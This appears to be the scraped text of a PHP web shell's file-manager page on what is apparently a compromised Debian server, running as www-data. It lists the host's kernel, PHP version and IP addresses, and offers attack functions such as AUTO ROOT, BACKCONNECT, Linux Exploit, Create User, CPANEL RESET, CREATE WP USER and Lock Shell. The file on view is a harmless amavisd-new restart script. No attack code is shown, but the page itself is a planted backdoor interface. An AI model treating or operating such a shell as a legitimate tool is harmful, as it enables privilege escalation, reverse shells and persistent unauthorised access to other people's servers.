Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 3.149.251.64
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
spamassassin /
sa-update-hooks.d /
[ HOME SHELL ]
Name
Size
Permission
Action
amavisd-new
710
B
-rwxr-xr-x
amavisd-new.dpkg-new
710
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : amavisd-new
#!/bin/sh #This scripts restarts amavisd-new after spamassassin #rules got updated NAME=amavisd-new AMAVISPID=/var/run/amavis/amavisd.pid INIT=/etc/init.d/amavis # stolen from dhcpd3 initscript # single arg is -v for messages, -q for none check_status() { if [ ! -r "$AMAVISPID" ]; then test "$1" != -v || echo "$NAME is not running." return 3 fi if read pid < "$AMAVISPID" && ps -p "$pid" > /dev/null 2>&1; then test "$1" != -v || echo "$NAME is running." return 0 else test "$1" != -v || echo "$NAME is not running but $AMAVISPID exists." return 1 fi } #exit if amavis is not running check_status || exit $INIT restart > /dev/null
Close